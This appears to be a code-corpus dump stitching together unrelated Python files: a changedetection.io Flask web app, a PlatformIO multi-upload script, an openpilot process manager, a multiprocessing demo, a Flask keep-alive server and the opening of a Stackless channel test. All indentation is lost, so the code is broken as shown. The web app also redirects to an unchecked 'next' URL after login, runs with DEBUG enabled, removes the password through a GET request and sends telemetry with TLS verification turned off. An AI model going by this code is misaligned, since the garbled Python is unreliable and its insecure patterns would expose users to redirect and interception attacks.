# populate_form in wtfors didnt work for me. (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
if not p.data:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def check_password(self, password):
import hashlib
import base64
# Getting the values back out
raw_salt_pass = base64.b64decode(datastore.data['settings']['application']['password'])
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
app.config.update(dict(DEBUG=True))
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password']:
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
next = request.args.get('next')
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(next or url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password loginif there is not one set
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
rss = request.args.get('rss')
if rss:
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
fe = fg.add_entry()
fe.title(watch['url'])
fe.link(href=watch['url'])
fe.description(watch['url'])
fe.guid(watch['uuid'], permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
else:
from backend import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
has_unviewed=datastore.data['has_unviewed'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub('(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from backend import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history availabe
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from backend import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid].update(update_obj)
datastore.needs_write = True
flash("Updated watch.")
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'uuid': uuid}
notification_q.put(n_object)
flash('Notifications queued.')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff':
return redirect(url_for('diff_history_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from backend import forms
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
# Password unset is a GET
if request.values.get('removepassword') == 'yes':
from pathlib import Path
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.needs_write = True
if form.trigger_check.data and len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data}
notification_q.put(n_object)
flash('Notifications queued.')
if form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Same as notification.py
base_url = os.getenv('BASE_URL', '').strip('"')
output = render_template("settings.html", form=form, base_url=base_url)
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky= True )
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.readlines()
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
current_diff_url=watch['url'],
uuid=uuid)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("/app/static/images", filename="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(app.config['datastore_path']).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(app.config['datastore_path'], "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = os.path.join(app.config['datastore_path'], "url-list.txt")
with open(list_file, "w") as f:
for uuid in datastore.data['watching']:
url = datastore.data['watching'][uuid]['url']
f.write("{}\r\n".format(url))
# Add it to the Zip
zipObj.write(list_file,
arcname="url-list.txt",
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
full_path = os.path.realpath(__file__)
p = os.path.dirname(full_path)
try:
return send_from_directory("{}/static/{}".format(p, group), filename=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from backend import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': datastore.data['version_tag'],
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from backend import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], e))
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from backend import update_worker
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Check for watches outside of the time threshold to put in the thread queue.
for uuid, watch in datastore.data['watching'].items():
# If they supplied an individual entry minutes to threshold.
if 'minutes_between_check' in watch and watch['minutes_between_check'] is not None:
max_time = watch['minutes_between_check'] * 60
else:
# Default system wide.
max_time = datastore.data['settings']['requests']['minutes_between_check'] * 60
threshold = time.time() - max_time
# Yeah, put it in the queue, it's more than time.
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
multiUpload.py
|
Import('env')
from platformio import util
import threading
from threading import Thread
from base64 import b64decode
import sys
import glob
import time
# Based on https://github.com/platformio/platformio-core/issues/1383
upload_cmd = env.subst('$UPLOADCMD')
def getPorts():
simultaneous_upload_ports = ARGUMENTS.get("SIMULTANEOUS_UPLOAD_PORTS")
ports = map(lambda x: {"port": str.strip(x)}, b64decode(simultaneous_upload_ports).split(','))
if ports[0]["port"] == "AUTO":
ports = util.get_serial_ports()
ports = filter(lambda x: x["port"].find("SLAB") != -1, ports)
return ports
returnCodes=[]
def run(port):
for i in range (5):
command = upload_cmd.replace('--port ""', '--port "' + port + '"')
command = command +" "+ env.subst('$BUILD_DIR/$PROGNAME') +".bin"
errorCode = env.Execute(command)
if errorCode == 0:
returnCodes.append( (port, errorCode) )
return
time.sleep(2)
returnCodes.append((port,errorCode))
def multi_upload(source, target, env):
print("Multi-target upload active on ports: ")
for x in getPorts():
print(" " + x["port"])
print("")
threads = []
for port in getPorts() :
thread = Thread(target=run, args=(port["port"],))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
encounteredError=False
sorted(returnCodes, key=lambda code: code[0])
print("")
print("Upload result -------------------------------------------------")
for code in returnCodes:
if(code[1]==0):
print("| " + code[0] + " Uploaded Successfully")
elif(code[1]==1):
print("| " + code[0] + " Encountered Exception, Check serial port")
encounteredError=True
elif(code[1]==2):
print("| " + code[0] + " Encountered Fatal Error")
encounteredError=True
print("")
if(encounteredError):
Exit(1)
if ARGUMENTS.get("SIMULTANEOUS_UPLOAD_PORTS") > 0:
env.Replace(UPLOADCMD="true")
env.AddPreAction("upload", multi_upload)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import get_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version, get_comma_remote
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("AutoLaneChangeEnabled", "0"),
("PrebuiltEnabled", "0"),
#UI things
("ShowDebugUI", "0"),
("ShowCpuTempUI", "0"),
("ShowBattLevelUI", "0"),
#Lateral Control Selection
#("INDI_Selected", "0"),
#("LQR_Selected", "1"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not get_dirty():
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=get_dirty(),
device=HARDWARE.get_device_type())
if get_comma_remote() and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=get_dirty(), origin=get_origin(), branch=get_short_branch(), commit=get_commit(),
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start()
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
cloudlog.warning(f"Shutting down manager - {param} set")
shutdown = True
if shutdown:
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
mp_workers.py
|
#
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print 'Unordered results:'
for i in range(len(TASKS1)):
print '\t', done_queue.get()
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print '\t', done_queue.get()
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "https://moneybrozbot.xyz"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_channel.py
|
from __future__ import absolute_import
import unittest
import stackless
try:
import threading
withThreads = True
except ImportError:
withThreads = False
import sys
import traceback
import contextlib
from support import test_main # @UnusedImport
from support import StacklessTestCase, require_one_thread
@contextlib.contextmanager
def block_trap(trap=True):
"""
A context manager to temporarily set the block trap state of the
current tasklet. Defaults to setting it to True
"""
c = stackless.getcurrent()
old = c.block_trap
c.block_trap = trap
try:
yield
finally:
c.block_trap = old
class TestChannels(StacklessTestCase):
def testBlockingSend(self):
''' Test that when a tasklet sends to a channel without waiting receivers, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.send(1)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding receiver")
# The channel should have a balance indicating one blocked sender.
self.assertTrue(channel.balance == 1, "The channel balance should indicate one blocked sender waiting for a corresponding receiver")
def testBlockingReceive(self):
''' Test that when a tasklet receives from a channel without waiting senders, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.receive()
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding sender")
# The channel should have a balance indicating one blocked sender.
self.assertEqual(channel.balance, -1, "The channel balance should indicate one blocked receiver waiting for a corresponding sender")
def testNonBlockingSend(self):
''' Test that when there is a waiting receiver, we can send without blocking with normal channel behaviour. '''
originalValue = 1
receivedValues = []
# Function to block when run in a tasklet.
def f(testChannel):
receivedValues.append(testChannel.receive())
